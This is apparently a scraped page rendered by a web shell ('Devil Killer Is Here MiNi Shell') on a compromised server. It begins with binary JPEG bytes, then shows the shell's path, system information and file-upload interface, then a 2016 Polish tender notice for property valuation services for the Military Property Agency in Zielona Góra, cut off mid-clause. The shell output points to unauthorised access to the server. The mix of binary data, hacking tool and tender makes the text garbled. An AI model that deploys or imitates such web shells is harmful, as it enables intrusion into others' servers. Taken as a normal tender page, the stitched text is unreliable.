JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/8935-N-2016.html

<p class="kh_header"><b>Zielona Góra: Wykonanie usług w zakresie szacowania wartości nieruchomości, ruchomości oraz nakładów poniesionych na nieruchomości.</b><br>
<b>Numer ogłoszenia: 8935 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Mienia Wojskowego Oddział Regionalny w Zielonej Górze , Al. Zjednoczenia 104, 65-120 Zielona Góra, woj. lubuskie, tel. 68 411 96 00, faks 68 411 96 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług w zakresie szacowania wartości nieruchomości, ruchomości oraz nakładów poniesionych na nieruchomości..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający stosownie do przepisów ustawy z dnia 10 lipca 2015 r. o Agencji Mienia Wojskowego (Dz. U. 2015 r. poz. 1322), ustawy z dnia 22 czerwca 1995 r. o zakwaterowaniu Sił Zbrojnych Rzeczypospolitej Polskiej (tekst jednolity: Dz. U. 2010 Nr 206 poz. 1367 z późn. zm.), oraz ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity: Dz. U. 2015 r., poz. 782 z późn. zm.) prowadzi sprzedaż w trybie bezprzetargowym i przetargowym lokali mieszkalnych wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych, oraz nieruchomości zabudowanych budynkami mieszkalnymi jednolokalowymi wraz powierzchnią przynależną i gruntem, jak również obrót lokalami użytkowymi wraz z powierzchnią przynależną i udziałem w gruncie, położonymi w budynkach wielolokalowych, oraz nieruchomościami zabudowanymi i niezabudowanymi. Zamawiający gospodaruje mieniem Skarbu Państwa w szczególności po przez: sprzedaż, zamianę, darowiznę, nieodpłatne przekazanie, ustanawianie trwałego zarządu, itp., z zastosowaniem cen nieruchomości ustalonych na podstawie wartości oszacowanych przez rzeczoznawców majątkowych.
W związku z powyższym przedmiot zamówienia obejmuje:
1.	Wykonanie operatów szacunkowych lokali mieszkalnych wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych (wraz z dołączeniem zaświadczenia o samodzielności lokalu).
2.	Wykonanie operatów szacunkowych lokali mieszkalnych wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych oraz wykonanie operatów szacunkowych budynków mieszkalnych jednolokalowych wraz z powierzchnia przynależna i gruntem (bez dołączenia zaświadczenia o samodzielności lokalu).
3.	Wykonanie operatów szacunkowych lokali o przeznaczeniu innym niż mieszkalnym wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych (wraz z dołączeniem zaświadczenia o samodzielności lokalu).
4.	Wykonanie operatów szacunkowych lokali o przeznaczeniu innym niż mieszkalnym wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych (bez dołączenia zaświadczenia o samodzielności lokalu).
5.	Wykonanie operatów szacunkowych nieruchomości gruntowych zabudowanych budynkami o łącznej powierzchni użytkowej do 100 m2.
6.	Wykonanie operatów szacunkowych nieruchomości gruntowych zabudowanych budynkami o łącznej powierzchni użytkowej powyżej 100 m2.
7.	Wykonanie operatów szacunkowych nieruchomości gruntowych niezabudowanych.
8.	Wykonanie operatów szacunkowych nieruchomości w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
9.	Wykonanie operatów szacunkowych w sprawie określenia wartości nakładów poniesionych na nieruchomości.
10.	Wykonanie operatów szacunkowych w celu wyceny rzeczy ruchomych.
11.	Ewentualne nieodpłatne wykonanie potwierdzeń aktualności wyżej opisanych operatów szacunkowych w terminie do dwóch lat licząc od daty sporządzenia tych operatów.
Do operatów szacunkowych opisanych w pkt 1-10 wymagane jest dołączenie niezbędnej do sprzedaży wycenianych nieruchomości dokumentacji uzyskanej na koszt Wykonawcy, tj.:
W przypadku sporządzania operatów szacunkowych opisanych w punktach 1 i 3:
a)	stosowne wypisy z ewidencji gruntów, z kartoteki budynków i lokali, w ilości 1 szt.,
b)	protokół z przeprowadzonej wizji lokalnej wycenianej nieruchomości podpisany przez osobę posiadającą tytuł prawny danej nieruchomości (w przypadku lokali wynajmowanych, wydzierżawionych, użyczonych, itd.), bądź podpisany przez miejscowego administratora (w przypadku lokali wolnych),
c)	minimum trzy fotografie wycenianej nieruchomości,
d)	tabelę udziałową całego budynku, w którym znajduje się wyceniany lokal, zawierającą: powierzchnię użytkową budynku, powierzchnię użytkową wszystkich lokali, powierzchnię użytkową wszystkich pomieszczeń przynależnych, powierzchnie poszczególnych lokali i pomieszczeń przynależnych z wyliczonym udziałem w częściach wspólnych nieruchomości,
e)	karty danych ewidencyjnych zawierającej: dane ewidencyjne nieruchomości, z której wyodrębniany jest dany lokal, dane ewidencyjne gruntu, numer księgi wieczystej, dane ewidencyjne lokalu, w ilości 2 szt.;
f)	komplet szkiców zawierający: szkic lokalu oraz usytuowanie lokalu na kondygnacji, szkic pomieszczeń przynależnych wraz z ich usytuowaniem na kondygnacji, w ilości 2 szt.,
g)	zaświadczenie o samodzielności danego lokalu.
W przypadku sporządzania operatów szacunkowych opisanych w punktach 2 i 4:
a)	stosowne wypisy z ewidencji gruntów, z kartoteki budynków i lokali, w ilości 1 szt.,
b)	protokół z przeprowadzonej wizji lokalnej wycenianej nieruchomości podpisany przez osobę posiadającą tytuł prawny danej nieruchomości (w przypadku lokali wynajmowanych, wydzierżawionych, użyczonych, itd.), bądź podpisany przez miejscowego administratora (w przypadku lokali wolnych),
c)	minimum trzy fotografie wycenianej nieruchomości,
d)	tabelę udziałową całego budynku, w którym znajduje się wyceniany lokal, zawierającą: powierzchnię użytkową budynku, powierzchnię użytkową wszystkich lokali, powierzchnię użytkową wszystkich pomieszczeń przynależnych, powierzchnie poszczególnych lokali i pomieszczeń przynależnych z wyliczonym udziałem w częściach wspólnych nieruchomości.
W przypadku sporządzania operatów szacunkowych opisanych w punktach 5 i 6:
a)	stosowne wypisy z ewidencji gruntów,
b)	stosowne wypisy z kartoteki budynków,
c)	protokół z przeprowadzonej wizji lokalnej,
d)	dokumentację fotograficzną ( min. 3 zdjęcia wycenianej nieruchomości),
e)	inwentaryzację budynków (rzuty poszczególnych kondygnacji wraz z zaznaczeniem pomieszczeń i podaniem powierzchni użytkowych poszczególnych pomieszczeń oraz powierzchni użytkowych i całkowitych inwentaryzowanych budynków),
W przypadku sporządzania operatów szacunkowych opisanych w punkcie 7 :
a)	stosownych wypisów z ewidencji gruntów,
b)	protokół z przeprowadzonej wizji lokalnej,
c)	dokumentacji fotograficznej (min. 3 zdjęcia),
W przypadku sporządzania operatów szacunkowych opisanych w punktach 8, 9 i 10:
a)	stosownych wypisów z ewidencji gruntów,
b)	protokół z przeprowadzonej wizji lokalnej,
c)	dokumentacji fotograficznej (min. 3 zdjęcia),

Zamawiający przewiduje zlecić do wykonania następującą ilość operatów szacunkowych:
1.	Wykonanie operatów szacunkowych lokali mieszkalnych wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych (wraz z dołączeniem zaświadczenia o samodzielności lokalu) - 150 szt.
2.	Wykonanie operatów szacunkowych lokali mieszkalnych wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych oraz wykonanie operatów szacunkowych budynków mieszkalnych jednolokalowych wraz z powierzchnia przynależna i gruntem (bez dołączenia zaświadczenia o samodzielności lokalu) 50 szt.
3.	Wykonanie operatów szacunkowych lokali o przeznaczeniu innym niż mieszkalnym wraz z powierzchnią przynależną i udziałem w gruncie, położonych w budynkach wielolokalowych (wraz z dołączeniem zaświadczenia o samodzielności lokalu) - 15 szt.
4.	Wykonanie operatów szacunkowych nieruchomości gruntowych zabudowanych budynkami o powierzchni użytkowej do 100 m2 włącznie - 5 szt.
5.	Wykonanie operatów szacunkowych nieruchomości gruntowych zabudowanych budynkami o powierzchni użytkowej powyżej 100 m2 - 20 szt.
6.	Wykonanie operatów szacunkowych nieruchomości gruntowych zabudowanych budynkami o powierzchni użytkowej powyżej 100 m2 - 40 szt.
7.	Wykonanie operatów szacunkowych nieruchomości gruntowych niezabudowanych - 150 szt.

Zamawiający zastrzega sobie prawo zmiany ilości zleconych do wykonania prac.

Zakres przedmiotu zamówienia obejmuje wykonanie operatów szacunkowych nieruchomości i rzeczy ruchomych stanowiących zasób AMW OReg w Zielonej Górze, zlokalizowanych w następujących miejscowościach:
woj. lubuskie: Babimost, Bobrzany, Czerwieńsk, Gorzów Wlkp., Gubin, Kostrzyn nad Odrą, Kożuchów, Krosno Odrzańskie, Międzyrzecz, Nowe Kramsko, Nowogród Bobrzański, Potok, Skwierzyna, Sława, Słubice, Sulechów, Sulęcin, Szczawno, Szklarka, Szklarka Radnicka, Wędrzyn, Zielona Góra, Żagań, Żary.
woj. zachodniopomorskie: Boleszkowice, Dębno Lubuskie, Myślibórz,
woj. dolnośląskie: Głogów, Świętoszów.
Zamawiający wymaga, aby operaty szacunkowe sporządzane były z należytą starannością, estetycznie, w jednym egzemplarzu (dla nieruchomości sprzedawanych w trybie bezprzetargowym na rzecz osób posiadających tytuły prawne do danych nieruchomości) lub w dwóch egzemplarzach (dla pozostałych nieruchomości), a wszystkie czynności związane ze sporządzeniem operatu szacunkowego winny być wykonane zgodnie z zasadami wynikającymi z przepisów prawa i standardami zawodowymi, ze szczególną starannością właściwą dla zawodowego charakteru tych czynności oraz zasadami etyki zawodowej rzeczoznawców majątkowych, przy zachowaniu zasady bezstronność przy określaniu wartości nieruchomości.
Operaty szacunkowe powinny zawierać m.in. zestawienia transakcji przyjętych do porównania, szczegółowe obliczenia, opis stanu przedmiotu wyceny, wskazanie przeznaczenia wycenianej nieruchomości, analizę i charakterystykę rynku w zakresie dotyczącym celu i sposobu wyceny, opisujące rynek właściwy ze względu na rodzaj, obszar i okres objęte analizą, uzasadnienie wyniku końcowego, dodatkowe i załączniki, których zamieszczenie jest uzasadnione.
W przypadku nie posiadania przez Zamawiającego dokumentacji inwentaryzacyjnej, obejmującej zleconą do wyceny nieruchomość lokalową, budynkową, Wykonawca obowiązany jest do sporządzenia tej dokumentacji własnym staraniem i na własny koszt.
Zamawiający zastrzega sobie prawo udostępnienia wyciągu z operatu szacunkowego najemcy lokalu, na jego wniosek, oraz prawo wglądu przez najemcę do operatu szacunkowego w siedzibie zamawiającego.
Zamawiający zastrzega sobie prawo udostępnienia wyciągu z operatu szacunkowego oraz prawo wglądu do operatu szacunkowego w siedzibie zamawiającego osobom trzecim, mającym interes prawny w stosunku do danej nieruchomości.
Zamawiający będzie zlecał wykonanie operatów szacunkowych nieruchomości sukcesywnie, wg własnych potrzeb. Do każdego sporządzonego operatu szacunkowego Wykonawca zobowiązany będzie dołączyć stosowną dokumentację, opisaną w niniejszym opisie przedmiotu zamówienia.
Wykonawca ustalając cenę ofertową do przetargu zobowiązani są uwzględnić koszt ewentualnego wykonania potwierdzeń aktualności operatów, zgodnie z art. 156 pkt 4 ustawy o gospodarce nieruchomościami.
Wykonawca wykona przedmiotowe prace za pomocą własnych środków transportu, narzędzi i materiałów, za co nie przysługuje mu dodatkowe wynagrodzenie.

Operaty szacunkowe winny być sporządzone zgodnie z wymogami, które określają przepisy prawa, a w szczególności:
a)	Ustawa z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity: Dz. U. 2015 r., poz. 782 z poźn. zm.),
b)	Ustawa z dnia 10 lipca 2015 r. o Agencji Mienia Wojskowego (Dz. U. 2015 r., poz.1322)
c)	Ustawa z dnia 22 czerwca 1995 r. o zakwaterowaniu Sił Zbrojnych Rzeczypospolitej Polskiej (tekst jednolity: Dz. U. 2015 r. poz. 746 z późn. zm.),
d)	Rozporządzenie Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. z 2004 r., Nr 207, poz. 2109 z poźn. zm.), 
e)	Krajowe Standardy Wyceny Podstawowe (KSWP) oraz Krajowe Standardy Wyceny Specjalistyczne (KSWS) Rady Krajowej Polskiej Federacji Stowarzyszeń Rzeczoznawców Majątkowych.

Przedmiot zamówienia opisany jest poniższymi kodami CPV: 
70000000-1: Usługi w zakresie nieruchomości
70331000-0: Usługi nieruchomości mieszkalnych
70332000-7: Usługi w zakresie nieruchomości innych niż mieszkalne

Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
Zamawiający żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy.
Zamawiający wymaga wskazania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp do wysokości 48,21% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.33.10.00-0, 70.33.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert w wysokości 1.500,00 zł tj. do dnia 04-01-2016 r. do godz. 12:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, gdy Wykonawca wykaże się doświadczeniem w wykonaniu, w przypadku świadczeń okresowych lub ciągłych w  wykonywaniu - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług, w zakresie szacowania nieruchomości obejmujących łącznie wykonanie 100 operatów szacunkowych z podaniem przedmiotu, daty wykonania i odbiorców (wykonawca zobowiązany jest zawrzeć ww. informacje w zał. nr 2 do SIWZ) wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, gdy Wykonawca wykaże, że minimum jedna osoba która będzie uczestniczyć w realizacji zamówienia będzie posiadała uprawnienia rzeczoznawcy majątkowego i jest wpisana do centralnego rejestru rzeczoznawców majątkowych.
Na potwierdzenie spełniania warunku wykonawca złoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami ( na podstawie wzoru zał. nr 6 do SIWZ) złożyć oświadczenie o posiadaniu uprawnień zgodnie z zał. 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać następujące dokumenty i oświadczenia:
a.	wypełniony i podpisany druk Formularz oferty (wg załącznika nr 1 do SIWZ),
b.	wskazanie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (wg załącznika nr 7 do SIWZ). 
Jeżeli wykonawca nie wskaże w ofercie części zamówienia, której wykonanie powierzy podwykonawcom, zamawiający uzna, że nie zamierza on powierzać podwykonawcom żadnych prac objętych niniejszym postępowaniem;
c.	oświadczenia i dokumenty, o których mowa w części V oraz VI SIWZ,
d.	wypełniony i podpisany formularz cenowy (wg załącznika nr 9 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się dokonywania istotnych zmian w stosunku do treści niniejszej umowy z wyjątkiem sytuacji, gdy:
